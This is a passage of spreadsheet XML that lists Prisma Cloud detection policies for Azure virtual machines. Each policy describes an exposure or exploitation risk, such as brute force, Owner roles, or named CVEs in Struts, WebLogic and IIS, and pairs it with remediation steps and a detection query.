        <is>
          <t>0d4887bc-53a2-496a-a110-412b13e17ad6</t>
        </is>
      </c>
      <c r="AJ2535" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2535" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2536">
      <c r="A2536" t="inlineStr"/>
      <c r="B2536" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2536" s="2" t="inlineStr"/>
      <c r="D2536" t="inlineStr"/>
      <c r="E2536" t="inlineStr"/>
      <c r="F2536" t="inlineStr"/>
      <c r="G2536" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2536" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2536" t="inlineStr">
        <is>
          <t>Brute force attack risk on a publicly exposed Azure Virtual Machine with Owner permissions</t>
        </is>
      </c>
      <c r="L2536" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2536" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2536" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2536" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2536" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2536" t="inlineStr"/>
      <c r="R2536" t="inlineStr"/>
      <c r="S2536" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2536" t="b">
        <v>0</v>
      </c>
      <c r="U2536" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2536" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2536" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed, use basic authentication instead of SSH keys, and have Azure built-in roles of Owner permissions.
Publicly exposed Azure Virtual Machine with basic authentication enables bad actors to use brute force on a system to gain unauthorized access. The Built-in Owner role grants full access to manage all resources in the scope, including the ability to assign roles in Azure RBAC. The Built-in Owner role on the Virtual Machine further helps the attackers to escalate their privileges, move laterally or perform other unauthorized actions in the cloud account.
Immediate attention is required to review role assignments and grant only the least privileges required. Remove unwanted roles assigned to the Virtual Machines, ensure Azure Virtual Machine uses SSH Key authentication instead of basic authentication, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X253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VM from the list</t>
        </is>
      </c>
      <c r="Y2536" t="inlineStr"/>
      <c r="Z2536" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Virtual Machine (Linux) does not authenticate using SSH keys','Azure VM instance associated managed identity with Azure built-in roles of Owner permissions')</t>
        </is>
      </c>
      <c r="AA2536" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2536" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:03</t>
        </is>
      </c>
      <c r="AC2536" t="inlineStr"/>
      <c r="AD2536" t="b">
        <v>1</v>
      </c>
      <c r="AE2536" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2536" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>3489fa57-4f0b-41c0-9796-7e89b3eb0739</t>
        </is>
      </c>
      <c r="AI2536" t="inlineStr">
        <is>
          <t>fa2c6a7b-1b4c-4a27-99f9-5a94e7c76b8e</t>
        </is>
      </c>
      <c r="AJ2536" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2536" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2537">
      <c r="A2537" t="inlineStr"/>
      <c r="B2537" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2537" s="2" t="inlineStr"/>
      <c r="D2537" t="inlineStr"/>
      <c r="E2537" t="inlineStr"/>
      <c r="F2537" t="inlineStr"/>
      <c r="G2537" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2537" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2537" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [Linux Kernel, CVE-2022-0847]</t>
        </is>
      </c>
      <c r="L2537" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2537" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2537" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2537" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2537" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2537" t="inlineStr"/>
      <c r="R2537" t="inlineStr"/>
      <c r="S2537" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2537" t="b">
        <v>0</v>
      </c>
      <c r="U2537" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2537" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2537" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable privilege escalation vulnerability [CVE-2022-0847].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Linux [CVE-2022-0847] vulnerability and public exposure reported for the cloud function as soon as possible.</t>
        </is>
      </c>
      <c r="X2537"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CVE-2022-0847
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2022-0847</t>
        </is>
      </c>
      <c r="Y2537" t="inlineStr"/>
      <c r="Z2537" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-0847'))</t>
        </is>
      </c>
      <c r="AA2537" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2537" t="inlineStr">
        <is>
          <t>2023-10-13 06:44:24</t>
        </is>
      </c>
      <c r="AC2537" t="inlineStr"/>
      <c r="AD2537" t="b">
        <v>1</v>
      </c>
      <c r="AE2537" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2537" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>16f299ca-e6c6-477d-bac1-43baa40bf3b3</t>
        </is>
      </c>
      <c r="AI2537" t="inlineStr">
        <is>
          <t>ccf3f5c7-9a4a-4cb1-9f17-0e61ca207ac0</t>
        </is>
      </c>
      <c r="AJ2537" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2537" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2538">
      <c r="A2538" t="inlineStr"/>
      <c r="B2538" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2538" s="2" t="inlineStr"/>
      <c r="D2538" t="inlineStr"/>
      <c r="E2538" t="inlineStr"/>
      <c r="F2538" t="inlineStr"/>
      <c r="G2538" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2538" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2538" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Apache Struts OGNL Evaluation, Multiple CVEs]</t>
        </is>
      </c>
      <c r="L2538" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2538" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2538" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2538" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2538" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2538" t="inlineStr"/>
      <c r="R2538" t="inlineStr"/>
      <c r="S2538" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2538" t="b">
        <v>0</v>
      </c>
      <c r="U2538" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2538" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2538" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [OGNL Evaluation Injection, Multiple CVEs]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Apache Struts software prone to OGNL Evaluation makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Apache Struts OGNL Evaluation Injection vulnerabilities reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X253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CVE-2020-17530
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
    https://nvd.nist.gov/vuln/detail/CVE-2020-17530
    https://nvd.nist.gov/vuln/detail/CVE-2019-0230
    https://nvd.nist.gov/vuln/detail/CVE-2018-11776
    https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    https://nvd.nist.gov/vuln/detail/CVE-2016-4461
    https://nvd.nist.gov/vuln/detail/CVE-2016-0785
    https://nvd.nist.gov/vuln/detail/CVE-2013-2135
    https://nvd.nist.gov/vuln/detail/CVE-2013-2134
    https://nvd.nist.gov/vuln/detail/CVE-2022-26134
    https://nvd.nist.gov/vuln/detail/CVE-2016-3081
    https://nvd.nist.gov/vuln/detail/CVE-2017-12611</t>
        </is>
      </c>
      <c r="Y2538" t="inlineStr"/>
      <c r="Z2538" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-17530, CVE-2019-0230, CVE-2018-11776, CVE-2017-5638, CVE-2016-4461, CVE-2016-0785, CVE-2013-2135, CVE-2013-2134, CVE-2022-26134, CVE-2016-3081, CVE-2017-12611 - OGNL Evaluation Injection) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-17530', 'CVE-2019-0230', 'CVE-2018-11776', 'CVE-2017-5638', 'CVE-2016-4461', 'CVE-2016-0785', 'CVE-2013-2135', 'CVE-2013-2134', 'CVE-2022-26134', 'CVE-2016-3081', 'CVE-2017-12611'))</t>
        </is>
      </c>
      <c r="AA2538" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2538" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:47</t>
        </is>
      </c>
      <c r="AC2538" t="inlineStr"/>
      <c r="AD2538" t="b">
        <v>1</v>
      </c>
      <c r="AE2538" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2538" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>d536cac8-5e27-4c21-beed-73bfd3b4605e</t>
        </is>
      </c>
      <c r="AI2538" t="inlineStr">
        <is>
          <t>75464ad1-2537-4aa1-bdf9-0769946733d6</t>
        </is>
      </c>
      <c r="AJ2538" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2538" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2539">
      <c r="A2539" t="inlineStr"/>
      <c r="B2539" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2539" s="2" t="inlineStr"/>
      <c r="D2539" t="inlineStr"/>
      <c r="E2539" t="inlineStr"/>
      <c r="F2539" t="inlineStr"/>
      <c r="G2539" t="b">
        <v>1</v>
      </c>
      <c r="H25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39" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2539" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2539" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]</t>
        </is>
      </c>
      <c r="L2539" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2539" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2539" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2539" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2539" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2539" t="inlineStr"/>
      <c r="R2539" t="inlineStr"/>
      <c r="S2539" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2539" t="b">
        <v>0</v>
      </c>
      <c r="U2539" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2539" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2539" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Oracle WebLogic Server, CVE-2020-14882, CVE-2020-14883]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Oracle WebLogic Server software installed makes it an easy target for an attacker to exploit these vulnerabilities. 
Immediate attention is required to remediate the Oracle WebLogic Server [CVE-2020-14882, CVE-2020-14883] vulnerabilities reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X253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CVE-2020-14882
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2020-14882
   https://nvd.nist.gov/vuln/detail/CVE-2020-14883</t>
        </is>
      </c>
      <c r="Y2539" t="inlineStr"/>
      <c r="Z2539" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2020-14882, CVE-2020-14883 - WebLogic RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2020-14882', 'CVE-2020-14883'))</t>
        </is>
      </c>
      <c r="AA2539" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2539" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:41</t>
        </is>
      </c>
      <c r="AC2539" t="inlineStr"/>
      <c r="AD2539" t="b">
        <v>1</v>
      </c>
      <c r="AE2539" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2539" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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39" t="inlineStr">
        <is>
          <t>82f89426-ffdc-4818-830f-29077f0771cc</t>
        </is>
      </c>
      <c r="AI2539" t="inlineStr">
        <is>
          <t>0d640d68-9471-44ff-aa7d-b9f002956537</t>
        </is>
      </c>
      <c r="AJ2539" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2539" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2540">
      <c r="A2540" t="inlineStr"/>
      <c r="B2540" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2540" s="2" t="inlineStr"/>
      <c r="D2540" t="inlineStr"/>
      <c r="E2540" t="inlineStr"/>
      <c r="F2540" t="inlineStr"/>
      <c r="G2540" t="b">
        <v>1</v>
      </c>
      <c r="H25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40" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2540" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2540" t="inlineStr">
        <is>
          <t>Privilege escalation and lateral movement risk due to a publicly exposed and vulnerable Azure Virtual Machine assigned with privilege role permissions</t>
        </is>
      </c>
      <c r="L2540" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2540" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2540" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2540" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2540" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2540" t="inlineStr"/>
      <c r="R2540" t="inlineStr"/>
      <c r="S2540" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2540" t="b">
        <v>0</v>
      </c>
      <c r="U2540" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2540" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2540" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed and vulnerable Azure Virtual Machines that are assigned with privilege role permissions.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Azure Virtual machine granted with privileged role permissions has the ability to modify role assignments or role definitions and grant themselves additional roles or provide additional permissions to roles they already possess access to, resulting in an escalation of privileges within the environment. This would allow them to further enumerate and exploit the environment.
Immediate attention is required to grant the least privileges required and remove unwanted risky role assignments / permissions assigned to the VM instance, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2540" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure Virtual machine by modifying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1. Sign in to Azure Console
2.Navigate to the Compute instance, and remove the attached role, or edit it and remove the excessive permissions.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40" t="inlineStr"/>
      <c r="Z2540" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ( 'azure-vm-list' ) and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)','Azure Compute Resource Assigned Role &amp; Role Assignment Related Permissions Which Could Lead to Privilege Escalation') AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2540" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2540" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:46</t>
        </is>
      </c>
      <c r="AC2540" t="inlineStr"/>
      <c r="AD2540" t="b">
        <v>1</v>
      </c>
      <c r="AE2540" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2540" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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40" t="inlineStr">
        <is>
          <t>cf4a4e4e-c5e1-408f-8139-6cb76df0ca53</t>
        </is>
      </c>
      <c r="AI2540" t="inlineStr">
        <is>
          <t>4c637c74-91b5-4c91-a816-b3af15539ba4</t>
        </is>
      </c>
      <c r="AJ2540" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2540" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2541">
      <c r="A2541" t="inlineStr"/>
      <c r="B2541" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2541" s="2" t="inlineStr"/>
      <c r="D2541" t="inlineStr"/>
      <c r="E2541" t="inlineStr"/>
      <c r="F2541" t="inlineStr"/>
      <c r="G2541" t="b">
        <v>1</v>
      </c>
      <c r="H25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1" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2541" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2541" t="inlineStr">
        <is>
          <t>Cloud breach risk due to publicly exposed admin ports on Azure Virtual Machine with Owner permissions</t>
        </is>
      </c>
      <c r="L2541" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2541" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2541" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2541" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2541" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2541" t="inlineStr"/>
      <c r="R2541" t="inlineStr"/>
      <c r="S2541" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2541" t="b">
        <v>0</v>
      </c>
      <c r="U2541" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2541" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2541" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines which are publicly exposed with unrestricted access to admin ports (SSH / RDP) and have Azure built-in Owner role.
The Built-in Owner role on the instance further helps the attackers to escalate their privileges, move laterally, or perform other unauthorized actions in the cloud account. The Built-in Owner role grants full access to manage all resources in the scope, including the ability to assign roles in Azure RBAC.
Immediate attention is required to review role assignments and grant only the least privileges required. Restrict public exposure of admin ports reported for the Virtual Machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2541"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VM from the list</t>
        </is>
      </c>
      <c r="Y2541" t="inlineStr"/>
      <c r="Z2541" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0) on Admin ports','Azure VM instance associated managed identity with Azure built-in roles of Owner permissions')</t>
        </is>
      </c>
      <c r="AA2541" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2541" t="inlineStr">
        <is>
          <t>2024-01-19 05:21:05</t>
        </is>
      </c>
      <c r="AC2541" t="inlineStr"/>
      <c r="AD2541" t="b">
        <v>1</v>
      </c>
      <c r="AE2541" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2541" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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1" t="inlineStr">
        <is>
          <t>ae3d04a9-4046-4a52-95e0-558a323d5086</t>
        </is>
      </c>
      <c r="AI2541" t="inlineStr">
        <is>
          <t>920e3568-a745-4670-83ca-04f7224e4a7f</t>
        </is>
      </c>
      <c r="AJ2541" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2541" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2542">
      <c r="A2542" t="inlineStr"/>
      <c r="B2542" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2542" s="2" t="inlineStr"/>
      <c r="D2542" t="inlineStr"/>
      <c r="E2542" t="inlineStr"/>
      <c r="F2542" t="inlineStr"/>
      <c r="G2542" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2542" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2542" t="inlineStr">
        <is>
          <t>Privilege escalation risk due to publicly exposed and vulnerable Azure Virtual Machine [Java Spring Framework, CVE-2021-22118]</t>
        </is>
      </c>
      <c r="L2542" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2542" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2542" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2542" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2542" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2542" t="inlineStr"/>
      <c r="R2542" t="inlineStr"/>
      <c r="S2542" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2542" t="b">
        <v>0</v>
      </c>
      <c r="U2542" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2542" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2542" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have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Java [CVE-2021-22118] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2542"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2542" t="inlineStr"/>
      <c r="Z2542" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2021-22118'))</t>
        </is>
      </c>
      <c r="AA2542" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2542" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:59</t>
        </is>
      </c>
      <c r="AC2542" t="inlineStr"/>
      <c r="AD2542" t="b">
        <v>1</v>
      </c>
      <c r="AE2542" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2542" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>b24cd8ef-9b80-4bf8-b118-d656e070c5d0</t>
        </is>
      </c>
      <c r="AI2542" t="inlineStr">
        <is>
          <t>f6622054-4c52-4868-b200-0aff801171ba</t>
        </is>
      </c>
      <c r="AJ2542" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2542" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2543">
      <c r="A2543" t="inlineStr"/>
      <c r="B2543" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2543" s="2" t="inlineStr"/>
      <c r="D2543" t="inlineStr"/>
      <c r="E2543" t="inlineStr"/>
      <c r="F2543" t="inlineStr"/>
      <c r="G2543" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2543" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2543" t="inlineStr">
        <is>
          <t>Remote Code Execution (RCE) or Denial of Service (DoS) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [MS15-034 Microsoft IIS, CVE-2015-1635]</t>
        </is>
      </c>
      <c r="L2543" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2543" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2543" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2543" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2543" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2543" t="inlineStr"/>
      <c r="R2543" t="inlineStr"/>
      <c r="S2543" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2543" t="b">
        <v>0</v>
      </c>
      <c r="U2543" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2543" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2543" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to either Remote Code Execution (RCE) or Denial of Service (DoS) with exploits in the wild [MS15-034 Microsoft IIS, CVE-2015-1635].
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version exposed makes it an easy target for an attacker to exploit this vulnerability.
Immediate attention is required to remediate the MS15-034 Microsoft IIS vulnerability [CVE-2015-1635] reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X254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CVE-2015-1635
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2015-1635</t>
        </is>
      </c>
      <c r="Y2543" t="inlineStr"/>
      <c r="Z2543" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2015-1635 - MS15-034 Microsoft IIS DoS or RCE) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2015-1635'))</t>
        </is>
      </c>
      <c r="AA2543" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
